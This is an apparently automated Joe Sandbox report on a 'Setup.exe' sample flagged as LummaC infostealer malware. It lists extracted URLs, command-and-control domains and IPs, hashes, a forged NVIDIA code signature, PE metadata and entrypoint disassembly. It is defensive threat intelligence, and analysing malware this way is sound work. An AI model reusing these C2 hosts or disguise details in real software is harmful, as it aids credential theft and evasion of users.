                                                                    https://www.eporner.com/EPORNEReporner.comeporner.cdn.eporner.comhttps://www.eporner.com/video-%s//&Setup.exefalse
                                                                      		high
                                                                      https://vivporn.com/wp-content/plugins/Setup.exefalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://klipvumisui.shop/int_clp_sha.txtf1Setup.exe, 00000000.00000003.2094324102.0000000003568000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4120573743.0000000003569000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://sloppymisskr.click/apiySetup.exe, 00000000.00000003.1902947617.00000000007EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://crl.starfieldtech.com/repository/sfsroot.crl0PSetup.exefalse
                                                                        		high
                                                                        https://www.tomabo.com/mp4-player/download.htmlSetup.exefalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://support.mozilla.org/products/firefoxgro.allSetup.exe, 00000000.00000003.1852703245.000000000381E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.hotmovs.tube/hotmovs.comhotmovs.tubeis_defaultvideo_urlhttps://hotmovs.com/api/videofileSetup.exefalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://cdn-fck.tnaflix.com/tnaflix/%s.fid?key=%s&VID=%s&nomp4=1&catID=0&rollover=1&startThumb=%s&emSetup.exefalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://klipvumisui.shop/int_clp_sha.txtSetup.exe, 00000000.00000003.2094324102.0000000003568000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4120573743.0000000003569000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://sloppymisskr.click/apiESetup.exe, 00000000.00000003.3044975990.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4119561424.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094224037.00000000007EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://www.tomabo.com/mp4-player/purchase.htmlhttps://www.tomabo.com/mp4-playerhttps://www.tomabo.cSetup.exefalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoSetup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://sloppymisskr.click/$Setup.exe, 00000000.00000003.1870829227.0000000000789000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1864396067.0000000000789000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://cegu.shop/4QSetup.exe, 00000000.00000003.3044975990.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4119561424.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094224037.00000000007EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                		unknown
                                                                                http://ocsp.thawte.com0Setup.exefalse
                                                                                  		high
                                                                                  https://www.youtube.com/playlist?list=%shttps://i.ytimg.com/vi/%s/maxresdefault.jpghttps://i.ytimg.cSetup.exefalse
                                                                                    		high
                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Setup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://crl.rootca1.amazontrust.com/rootca1.crl0Setup.exe, 00000000.00000003.1851630664.00000000035B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://ocsp.rootca1.amazontrust.com0:Setup.exe, 00000000.00000003.1851630664.00000000035B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Setup.exe, 00000000.00000003.1834178767.00000000035C9000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1822159529.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1822224930.00000000035C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://cegu.shop/1BSetup.exe, 00000000.00000003.3044975990.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4119561424.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094224037.00000000007EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            		unknown
                                                                                            https://sloppymisskr.click/apiWSetup.exe, 00000000.00000003.1917452260.0000000003561000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1903114467.0000000003568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://certificates.starfieldtech.com/repository/1604Setup.exefalse
                                                                                              		high
                                                                                              https://www.ecosia.org/newtab/Setup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.youtube.com/youtubei/v1/player?key=%s&prettyPrint=falseOriginX-Youtube-Client-VersionX-YSetup.exefalse
                                                                                                  		high
                                                                                                  http://www.symauth.com/cps0(Setup.exefalse
                                                                                                    		high
                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSetup.exe, 00000000.00000003.1852703245.000000000381E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.hotmovs.com/Setup.exefalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://ac.ecosia.org/autocomplete?q=Setup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.youtube.com/watch?v=%s&gl=US&hl=en&has_verified=1&bpctr=9999999999lengthSecondshlsManifeSetup.exefalse
                                                                                                          		high
                                                                                                          http://crl.starfieldtech.com/repository/0Setup.exefalse
                                                                                                            		high
                                                                                                            https://www.tomabo.com/videos/dog-and-balls.mp4PleaseSetup.exefalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://www.tomabo.comVersionSetup.exefalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://crl.microSetup.exe, Setup.exe, 00000000.00000003.1870829227.0000000000789000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094224037.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1864396067.0000000000789000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://www.tnaflix.com/Tnaflixtnaflix.comtnaflix.Setup.exefalse
                                                                                                                		high
                                                                                                                http://www.symauth.com/rpa00Setup.exefalse
                                                                                                                  		high
                                                                                                                  https://support.microsofSetup.exe, 00000000.00000003.1822159529.00000000035D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?Setup.exe, 00000000.00000003.1851630664.00000000035B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://sloppymisskr.click/panymSetup.exe, 00000000.00000003.2094224037.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4119539930.00000000007E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://www.redtube.com/RedTuberedtube.comredtube.https://www.redtube.com/%sid=/player/?id=?id=Setup.exefalse
                                                                                                                        		high
                                                                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesSetup.exe, 00000000.00000003.1822224930.00000000035A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Setup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://www.google.com/GoogleSetup.exefalse
                                                                                                                              		high
                                                                                                                              https://cegu.shop//Setup.exe, 00000000.00000003.3044975990.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094224037.00000000007EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: malware
                                                                                                                              		unknown
                                                                                                                              https://www.eporner.com/xhr/video/%s?hash=%s&device=generic&domain=www.eporner.com&fallback=falsevarSetup.exefalse
                                                                                                                                		high
                                                                                                                                https://api.github.com/repos/ytdl-org/ytdl-nightly/releases/latestMX_ytdlbrowser_download_urlyoutubeSetup.exefalse
                                                                                                                                  		high
                                                                                                                                  https://www.youtube.com/youtubei/v1/browse?key=%s&prettyPrint=falseX-Goog-Visitor-IdcontinuationclicSetup.exefalse
                                                                                                                                    		high

                                                                                                                                    World Map of Contacted IPs

                                                                                                                                    • No. of IPs < 25%
                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                    • 75% < No. of IPs

                                                                                                                                    Public IPs

                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                    104.21.90.109
                                                                                                                                    		sloppymisskr.clickUnited States
                                                                                                                                    		13335CLOUDFLARENETUStrue
                                                                                                                                    185.161.251.21
                                                                                                                                    		cegu.shopUnited Kingdom
                                                                                                                                    		5089NTLGBfalse

                                                                                                                                    General Information

                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                    Analysis ID:1584503
                                                                                                                                    Start date and time:2025-01-05 17:53:11 +01:00
                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                    Overall analysis duration:0h 7m 39s
                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                    Report type:full
                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                    Number of analysed new started processes analysed:5
                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                    Technologies:
                                                                                                                                    • HCA enabled
                                                                                                                                    • EGA enabled
                                                                                                                                    • AMSI enabled
                                                                                                                                    Analysis Mode:default
                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                    Sample name:Setup.exe
                                                                                                                                    Detection:MAL
                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@1/0@2/2
                                                                                                                                    EGA Information:Failed
                                                                                                                                    HCA Information:
                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                    • Number of executed functions: 0
                                                                                                                                    • Number of non-executed functions: 1
                                                                                                                                    Cookbook Comments:
                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                    • Override analysis time to 240s for sample files taking high CPU consumption

                                                                                                                                    Warnings

                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                    • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
                                                                                                                                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                    • Execution Graph export aborted for target Setup.exe, PID 6860 because there are no executed function
                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                    Simulations

                                                                                                                                    Behavior and APIs

                                                                                                                                    TimeTypeDescription
                                                                                                                                    11:54:14API Interceptor10x Sleep call for process: Setup.exe modified

                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                    IPs

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    185.161.251.21Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                        SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                              Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                Poket.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                  setup.exeGet hashmaliciousLummaCBrowse

                                                                                                                                                    Domains

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    cegu.shopFull_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 185.161.251.21
                                                                                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 185.161.251.21
                                                                                                                                                    SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 185.161.251.21
                                                                                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 185.161.251.21
                                                                                                                                                    Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 185.161.251.21
                                                                                                                                                    Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 185.161.251.21
                                                                                                                                                    Poket.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 185.161.251.21
                                                                                                                                                    setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 185.161.251.21

                                                                                                                                                    ASNs

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    CLOUDFLARENETUSFull_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 172.67.196.191
                                                                                                                                                    momo.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                    • 1.1.1.1
                                                                                                                                                    momo.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                    • 1.1.1.1
                                                                                                                                                    momo.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                    • 1.1.1.1
                                                                                                                                                    momo.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                    • 1.1.1.1
                                                                                                                                                    momo.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                    • 1.1.1.1
                                                                                                                                                    z0r0.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                    • 172.71.176.132
                                                                                                                                                    drop1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                    • 104.26.13.205
                                                                                                                                                    avaydna.exeGet hashmaliciousNjratBrowse
                                                                                                                                                    • 104.17.25.14
                                                                                                                                                    HateSpeech2024_Summary.pdf.lnk.bin.lnkGet hashmaliciousEmmenhtal Loader, MalLnkBrowse
                                                                                                                                                    • 104.21.2.79
                                                                                                                                                    NTLGBFull_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 185.161.251.21
                                                                                                                                                    momo.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                    • 82.18.222.135
                                                                                                                                                    momo.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                    • 82.17.192.171
                                                                                                                                                    momo.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                    • 82.128.104.220
                                                                                                                                                    momo.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                    • 86.15.30.49
                                                                                                                                                    z0r0.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                    • 86.17.1.179
                                                                                                                                                    z0r0.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                    • 81.99.50.70
                                                                                                                                                    z0r0.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                    • 81.103.250.108
                                                                                                                                                    z0r0.i686.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                    • 82.2.230.58
                                                                                                                                                    armv4l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 82.38.39.22

                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    a0e9f5d64349fb13191bc781f81f42e1Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.90.109
                                                                                                                                                    • 185.161.251.21
                                                                                                                                                    K27Yg4V48M.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.90.109
                                                                                                                                                    • 185.161.251.21
                                                                                                                                                    IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.90.109
                                                                                                                                                    • 185.161.251.21
                                                                                                                                                    3jL3mqtjCn.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.90.109
                                                                                                                                                    • 185.161.251.21
                                                                                                                                                    file.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                                                                                    • 104.21.90.109
                                                                                                                                                    • 185.161.251.21
                                                                                                                                                    J18zxRjOes.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.90.109
                                                                                                                                                    • 185.161.251.21
                                                                                                                                                    ZxSWvC0Tz7.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.90.109
                                                                                                                                                    • 185.161.251.21
                                                                                                                                                    SOElePqvtf.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.90.109
                                                                                                                                                    • 185.161.251.21
                                                                                                                                                    m4lz5aeAiN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.90.109
                                                                                                                                                    • 185.161.251.21
                                                                                                                                                    ehD7zv3l4U.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.90.109
                                                                                                                                                    • 185.161.251.21

                                                                                                                                                    Dropped Files

                                                                                                                                                    No context

                                                                                                                                                    Created / dropped Files

                                                                                                                                                    No created / dropped files found

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Entropy (8bit):0.6971701645747819
                                                                                                                                                    TrID:
                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.53%
                                                                                                                                                    • InstallShield setup (43055/19) 0.43%
                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                    File name:Setup.exe
                                                                                                                                                    File size:76'573'072 bytes
                                                                                                                                                    MD5:2f84c8a115eb4fa477054b3915d6d156
                                                                                                                                                    SHA1:0aa8a86694bf487867861c8d51919b558b62ef3c
                                                                                                                                                    SHA256:a13eeb5717208e256a8b59d7baa24754f0b81f9fa9d7e7a0cf60b07fc0e489dd
                                                                                                                                                    SHA512:3c2abae78db024aded2b34c4a7a1bb1ed76afd4fcafceb7948a3a08a5b08c86e84a6b1734fb367ffdcb5d408d8dad4c85e9195ce41df4ddd6525db41df7ef508
                                                                                                                                                    SSDEEP:49152:H3UdqOr+inXPPpBs1qg5lRCT8DZ5mK5fIbgD:H8F++gfXRxDIgD
                                                                                                                                                    TLSH:72F76C103643C1A2F72BF770892792E9A5E05C3CFF9206CFD54BBB1B65BA5C4423A919
                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L>.."m.."m.."m.."m.."m...m.."m..)m.."m..(m.."mg.}m.."mj.,m.."m..#my."mj..m.."m..(m.."m..$m.."m..)mB."mRich.."m........PE..L..

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:4dd933f06831b24d

                                                                                                                                                    Static PE Info

                                                                                                                                                    General

                                                                                                                                                    Entrypoint:0x4ef5dc
                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                    Digitally signed:true
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                    DLL Characteristics:
                                                                                                                                                    Time Stamp:0x676BB07E [Wed Dec 25 07:13:02 2024 UTC]
                                                                                                                                                    TLS Callbacks:
                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                    OS Version Major:4
                                                                                                                                                    OS Version Minor:0
                                                                                                                                                    File Version Major:4
                                                                                                                                                    File Version Minor:0
                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                    Import Hash:ff67bf11cc36c35722df0b7f1c459325

                                                                                                                                                    Authenticode Signature

                                                                                                                                                    Signature Valid:false
                                                                                                                                                    Signature Issuer:CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
                                                                                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                    Error Number:-2146869232
                                                                                                                                                    Not Before, Not After
                                                                                                                                                    • 27/07/2015 20:00:00 26/07/2018 19:59:59
                                                                                                                                                    Subject Chain
                                                                                                                                                    • CN=NVIDIA Corporation, O=NVIDIA Corporation, L=SANTA CLARA, S=California, C=US
                                                                                                                                                    Version:3
                                                                                                                                                    Thumbprint MD5:F7219078FBE20BC1B98BF8A86BFC0396
                                                                                                                                                    Thumbprint SHA-1:30632EA310114105969D0BDA28FDCE267104754F
                                                                                                                                                    Thumbprint SHA-256:1B5061CF61C93822BDE2433156EEBE1F027C8FA9C88A4AF0EBD1348AF79C61E2
                                                                                                                                                    Serial:14781BC862E8DC503A559346F5DCC518

                                                                                                                                                    Entrypoint Preview

                                                                                                                                                    Instruction
                                                                                                                                                    push ebp
                                                                                                                                                    mov ebp, esp
                                                                                                                                                    push FFFFFFFFh
                                                                                                                                                    push 0058B0F8h
                                                                                                                                                    push 004F5DC0h
                                                                                                                                                    mov eax, dword ptr fs:[00000000h]
                                                                                                                                                    push eax
                                                                                                                                                    mov dword ptr fs:[00000000h], esp
                                                                                                                                                    sub esp, 58h
                                                                                                                                                    push ebx
                                                                                                                                                    push esi
                                                                                                                                                    push edi
                                                                                                                                                    mov dword ptr [ebp-18h], esp
                                                                                                                                                    call dword ptr [00575374h]
                                                                                                                                                    xor edx, edx
                                                                                                                                                    mov dl, ah
                                                                                                                                                    mov dword ptr [0064A114h], edx
                                                                                                                                                    mov ecx, eax
                                                                                                                                                    and ecx, 000000FFh
                                                                                                                                                    mov dword ptr [0064A110h], ecx
                                                                                                                                                    shl ecx, 08h
                                                                                                                                                    add ecx, edx
                                                                                                                                                    mov dword ptr [0064A10Ch], ecx
                                                                                                                                                    shr eax, 10h
                                                                                                                                                    mov dword ptr [0064A108h], eax
                                                                                                                                                    push 00000001h
                                                                                                                                                    call 00007FD76086E306h
                                                                                                                                                    pop ecx
                                                                                                                                                    test eax, eax
                                                                                                                                                    jne 00007FD760867BEAh
                                                                                                                                                    push 0000001Ch
                                                                                                                                                    call 00007FD760867CA7h
                                                                                                                                                    pop ecx
                                                                                                                                                    call 00007FD76086E011h
                                                                                                                                                    test eax, eax
                                                                                                                                                    jne 00007FD760867BEAh
                                                                                                                                                    push 00000010h
                                                                                                                                                    call 00007FD760867C96h
                                                                                                                                                    pop ecx
                                                                                                                                                    xor esi, esi
                                                                                                                                                    mov dword ptr [ebp-04h], esi
                                                                                                                                                    call 00007FD76086DE3Fh
                                                                                                                                                    call 00007FD76086DD99h
                                                                                                                                                    mov dword ptr [0064DA54h], eax
                                                                                                                                                    call 00007FD76086DC22h
                                                                                                                                                    mov dword ptr [0064A0F4h], eax
                                                                                                                                                    call 00007FD76086D9EFh
                                                                                                                                                    call 00007FD76086D932h
                                                                                                                                                    call 00007FD76086847Eh
                                                                                                                                                    mov dword ptr [ebp-30h], esi
                                                                                                                                                    lea eax, dword ptr [ebp-5Ch]
                                                                                                                                                    push eax
                                                                                                                                                    call dword ptr [005752DCh]
                                                                                                                                                    call 00007FD76086D8D6h
                                                                                                                                                    mov dword ptr [ebp-64h], eax
                                                                                                                                                    test byte ptr [ebp-30h], 00000001h
                                                                                                                                                    je 00007FD760867BE8h
                                                                                                                                                    movzx eax, word ptr [ebp-2Ch]

                                                                                                                                                    Rich Headers

                                                                                                                                                    Programming Language:
                                                                                                                                                    • [ C ] VS98 (6.0) SP6 build 8804
                                                                                                                                                    • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                                    • [C++] VS98 (6.0) SP6 build 8804

                                                                                                                                                    Data Directories

                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1acec00x12c.rdata
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x24f0000xa3000.rsrc
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x4902fd00x39c0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x1750000x848.rdata
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                    Sections

                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                    .text0x10000x173bd80x1740009aba2c97f567db009e0da8ba6a746c55False0.5098726005964381data6.683651481868028IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                    .rdata0x1750000x3ac1e0x3b0007d90b567ca926b4c16bc3e8e715834a3False0.2986005362817797data4.777250629842978IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                    .data0x1b00000x9e5880x98000aa8a391fe0255a3eff2beea09b53776eFalse0.108978271484375data1.9379617641950813IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                    .rsrc0x24f0000xa30000xa3000ca360f8e125702157eddf5d0b18e8d61False0.3978293951303681data6.218729318962462IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                    Resources

                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                    RT_CURSOR0x2991900x134dataEnglishUnited States0.37337662337662336
                                                                                                                                                    RT_CURSOR0x2992e00x134Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.6298701298701299
                                                                                                                                                    RT_CURSOR0x2994300x134Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.5292207792207793
                                                                                                                                                    RT_CURSOR0x2995800x134Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.487012987012987
                                                                                                                                                    RT_CURSOR0x2996d00x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4805194805194805
                                                                                                                                                    RT_CURSOR0x2998080xb4Targa image data - Map 32 x 65536 x 1 +16 "\001"EnglishUnited States0.7
                                                                                                                                                    RT_BITMAP0x2691e00x4828Device independent bitmap graphic, 96 x 48 x 32, image size 18432, resolution 4379 x 4379 px/mEnglishUnited States0.055381117366825466
                                                                                                                                                    RT_BITMAP0x2750300x9c8Device independent bitmap graphic, 240 x 20 x 4, image size 2400EnglishUnited States0.06988817891373802
                                                                                                                                                    RT_BITMAP0x263c100x5128Device independent bitmap graphic, 216 x 24 x 32, image size 20736, resolution 18142 x 18142 px/mEnglishUnited States0.1476703889102811
                                                                                                                                                    RT_BITMAP0x2771080xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.29310344827586204
